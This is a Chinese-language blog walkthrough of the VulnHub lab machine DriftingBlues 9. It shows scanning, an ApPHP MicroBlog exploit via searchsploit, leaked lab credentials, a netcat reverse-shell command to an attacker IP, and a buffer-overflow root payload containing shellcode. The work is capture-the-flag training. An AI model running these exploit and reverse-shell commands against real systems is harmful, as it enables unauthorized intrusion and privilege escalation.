靶机渗透练习09-driftingblues9

最新推荐文章于 2024-03-10 17:40:41 发布
原创 最新推荐文章于 2024-03-10 17:40:41 发布
· 3.5k 阅读 · 0 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#渗透测试 #web安全

靶机地址: https://www.vulnhub.com/entry/driftingblues-9-final,695/

1、主机探活

arp-scan -I eth0 -l (指定网卡扫) 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息)
masscan 192.168.111.0/24 -p 80,22 (masscan 扫描的网段 -p 扫描端口号)
netdiscover -i eth0 -r 192.168.184.0/24 (netdiscover -i 网卡-r 网段)
nmap -sn 192.168.111.0/24

2、端口扫描

nmap -sS -A -sV -T4 -p- 192.168.111.22
80—http—Apache httpd 2.4.10 ((Debian))
111—rpcbind 2-4 (RPC #100000)
33809—(RPC #100024)

3、80端口分析
在这里插入图片描述
随便点点上面的东西发现了这玩意是ApPHP MicroBlog
在这里插入图片描述
然后在源代码的地方发现了其版本信息为v.1.0.1
在这里插入图片描述
4、漏洞利用
和第八个靶机一样,在kali的本地漏洞库搜索看看
在这里插入图片描述
芜湖,还真的有,直接尝试利用。先将脚本复制到当前目录,然后使用exp尝试攻击

1、searchsploit -m php/webapps/33070.py
2、python2 33070.py http://192.168.111.22/index.php

在这里插入图片描述
成功拿到了一个普通权限的shell
5、我们还看到了此exp竟然显示出了数据库配置文件信息,看到了一个用户

用户名: clapton
密码: yaraklitepe

此时思路如下:看看家目录有无此用户,有的话可以尝试登录 (这里还可以通过/etc/passwd文件中发现存在普通用户clapton)

ls /home
在这里插入图片描述

发现存在此用户,但是之前的端口扫描发现22端口未开放,那我们就直接切换用户
先反弹个shell到kali再进行切换用户操作

1、看看有无nc,有的话直接用nc -e反弹:which nc
2、kali开启监听:nc -lvnp 4444
3、使用nc反弹shell:nc -e /bin/bash 192.168.111.7 4444
4、成功获取到反弹shell后切换到交互式shell:python -c 'import pty;pty.spawn("/bin/bash")'
5、切换用户:su clapton

这里如果没有nc的话就用bash或者python去反弹shell

在这里插入图片描述
成功切换后,在 /home/clapton 目录下拿到 flag1
同时在当前目录发现 note.txt ,查看内容发现相关提示

buffer overflow is the way. ( ° ʖ °)
if you're new on 32bit bof then check these:
https://www.tenouk.com/Bufferoverflowc/Bufferoverflow6.html
https://samsclass.info/127/proj/lbuf1.htm

缓冲区溢出就是解决方法。( ° ʖ °)
如果您是32位转炉的新手,请检查以下内容:
https://www.tenouk.com/Bufferoverflowc/Bufferoverflow6.html
https://samsclass.info/127/proj/lbuf1.htm

所以提权的方法就是利用缓冲区溢出
6、尝试提权(这里pwn是我的知识盲区,没有学过。。。)

这里给出别的大佬wp,大家感兴趣去学习学习:
https://cn-sec.com/archives/757904.html
https://blog.csdn.net/qq_32261191/article/details/117908644

给出payload:

for a in {1..1000}; do (./input $(python -c 'print "A" * 171 + "\x80\x26\x83\xbf" + "\x90" * 2000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80" ')); done

在这里插入图片描述
拿到root权限,完结散花~

总结:
1、细心的做好信息收集,网站的一些链接、源代码等。
2、searchsploit 工具的用法
3、缓冲区漏洞提权

参考:
https://www.tenouk.com/Bufferoverflowc/Bufferoverflow6.html
https://samsclass.info/127/proj/lbuf1.htm
hirak0

靶机渗透练习08-driftingblues9
hirak0的博客
04-14 639
靶机描述 靶机地址:https://www.vulnhub.com/entry/driftingblues-9-final,695/ Description get flags difficulty: easy about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions. 一、搭
VulnHub-driftingblues:9
江左盟的博客
06-20 1万+
简介 信息收集 扫 管理地址 啊 漏洞发现 漏洞利用 权限提升
DC-5靶机实战
0XAXSDD的博客
06-12 645
DC-5靶机实战 vm打开靶机,nat模式,kali主机发现,全扫描 发现开放了http服务。和rpcbind 2-4 用msf利用了一下辅助模块扫了一下rpcbing 没反应 转向web,打开是一个这样的网站 寻找api接口,看有没有可利用的,让我注意到contact这个页面 提交之前是 提交之后是 然后御剑扫描路径发现 这个页面很有趣。刷新一下,里面就会变 这里可以联想到,contact文件肯定包含了这个页面的文件,fuzz一下参数 file参数成功打开文件包含的入口 然后通过前面的端口服务扫
【VulnHub系列】DC-5靶机
薛定谔嘚喵博客
03-10 364
DC-5靶机
ssh服务渗透(拿到第一个用户权限)
weixin_43803070的博客
07-19 1696
** ssh基础知识: ** ** 一、信息收集 ** 探测开放端口服务 root@kali:~# nmap -sV 192.168.1.107 Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2019-07-05 21:04 CST Nmap scan report for 192.168.1.107 Host is up (0.00013s l...
DriftingBlues-7靶机进行渗透测试
zll___的博客
04-20 762
DriftingBlues-7靶机进行渗透测试
vulnhub靶机 driftingblues2
最新发布
01-04
DriftingBlues系列是VulnHub平台上提供给安全爱好者练习渗透测试技能的一组虚拟机镜像。这些靶机设计用于帮助用户提升其在网络攻防方面的能力,特别是针对Web应用的安全评估技巧。 对于特定的`DriftingBlues: 2`...
PAT甲级emergenc测试点
07-28
- *1* *2* [靶机渗透练习04-driftingblues4](https://blog.csdn.net/Forces_/article/details/123771426)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
PAT甲级emergenc测试点过不了
07-28
- *1* *3* [靶机渗透练习04-driftingblues4](https://blog.csdn.net/Forces_/article/details/123771426)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
kali对常见端口的漏洞破解收录
a_ittle_pan的博客
09-13 3254
1.web应用漏洞扫描 1).Owasp-zap(扫描漏洞) 2).nikto(漏洞扫描) nikto +host +"destip" 3).sqlmap(sql注入) 2.TCP漏洞利用 1).使用Nmap进行端口扫描 nmap -p 21 "destip" 2).使用nc进行ftp链接 nc “destip” 3.TCP密码暴力破解 1).medusa Medusa [-h host|-H file] [-u username|-U file] [-p passw
DC5靶场
m0_62438849的博客
03-10 1049
计算机 A 上的进程,调用另外一台计算机 B 上的进程,其中 A 上的调用进程被挂起,而 B 上的被调用进程开始执行,当值返回给 A 时,A 进程继续执行。100000 2,3,4 111/tcp rpcbind表明RPC编号为100000的服务(即rpcbind)的版本2、3、4在TCP协议的111端口上可用。(传输数据的两种方法,get、post,post是在消息体存放数据,get是在消息头的url路径里存放数据)如果包含时间段,则第一个年份为第一次发布的年份,第二个是当前版本发布的年份。
端口号扫描工具---nmap
chunlovenan的专栏
10-23 7871
Nmap(Network Mapper)是一款开放源代码的网络探测和安全审核工具。它用于快速扫描一个网络和一台主机开放的端口,还能使用TCP/IP协议栈特征探测远程主机的操作系统类型。nmap支持很多扫描技术,例如:UDP、TCP connect()、TCP SYN(半开扫描)、ftp代理(bounce攻击)、反向标志、ICMP、FIN、ACK扫描、圣诞树(Xmas Tree)、SYN扫描和nul
nmap扫描常用命令详解
鹿鸣天涯
09-12 2万+
常用命令:-vv是详细信息 nmap -vv -sT -sV -Pn 192.168.200.14 -p 1433 nmap -sT -sV -Pn 192.168.200.14 -p 1433 -sT TCP connect()扫描,这种方式会在目标主机的日志中记录大批连接请求和错误信息。 -sS 半开扫描,很少有系统能把它记入系统日志。不过,需要Root权限。 -sF -sN 秘密FIN数据包扫描、Xmas Tree、Null扫描模式 -s...
Metasploit2: tcp port 111 – rpcbind
Nixawk
07-29 8728
Metasploit2: tcpport 111 – rpcbind RPC& portmapper (111 TCP + other UDP) portmapper服务是这样工作的:当我连接portmapper端口时,表明我想使用一个指定的RPC服务。portmapper会告诉我该使用哪个端口.(RPC是RemoteProcedure Call的简称,类似与执行远程主机上
Linux下nfs+rpcbind实现服务器之间的文件共享(mount 挂载)
一条努力翻身的金龙鱼
11-03 1万+
1、安装nfs和rpcbind检查自己的电脑是否已经默认安装了nfs和rpcbind:rpm -aq | grep nfsnfs-utils-1.2.3-54.el6.x86_64nfs4-acl-tools-0.3.3-6.el6.x86_64 nfs-utils-lib-1.1.5-9.el6.x86_64rpm -aq | grep rpcbindrpcbind-0.2.0-11.el6.x8
111端口rpcbind漏洞
热门推荐
HEAVEN569的博客
03-12 2万+
111端口rpcbind漏洞 最近扫描一个内网的ip,发现有一个不常见的端口开着,服务是rpcbind,上网一查还真是有漏洞。 该漏洞可使攻击者在远程rpcbind绑定主机上分配任意大小的内存(每次攻击最高可达4GB),除非进程崩溃,或者管理员挂起/重启rpcbind服务,否则该内存不会被释放。 nmap -sS -sV -T4 192.168.26.28 使用metasploit(msf)验证漏洞 use auxiliary/scanner/misc/sunrpc_portmapper .
Nessus漏洞扫描教程之使用Nmap工具扫描识别指纹
大学霸__IT达人
07-13 9668
Nessus漏洞扫描教程之使用Nmap工具扫描识别指纹
rpcbind相关漏洞验证
afei001
06-07 4385
1.rpcbind介绍 2.rpcbind信息泄露 3.RPCbind dos攻击漏洞 4.SunRPC Portmap程序枚举 5.SunRPC缓冲区溢出漏洞 1.rpcbind介绍 rpcbind是一个使用在Linux系统中的将RPC程序编号转换为通用地址的服务器。 2.rpcbind信息泄露 nmap验证: nmap -p 111 --script=rpcinfo --unprivileged x.x.x.x 3.RPCbind dos攻击漏洞 ...
Centos下nfs+rpcbind实现服务器之间的文件共享
小小默:进无止境
02-11 2585
这里服务器环境为Centos6.8 64位,并关闭了防火墙。 NFS(Network File System)即网络文件系统,是FreeBSD支持的文件系统中的一种,它允许网络中的计算机之间通过TCP/IP网络共享资源。在NFS的应用中,本地NFS的客户端应用可以透明地读写位于远端NFS服务器上的文件,就像访问本地文件一样。 【1】安装nfs和rpcbind ① 检测是否已经安装 [root@lo...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值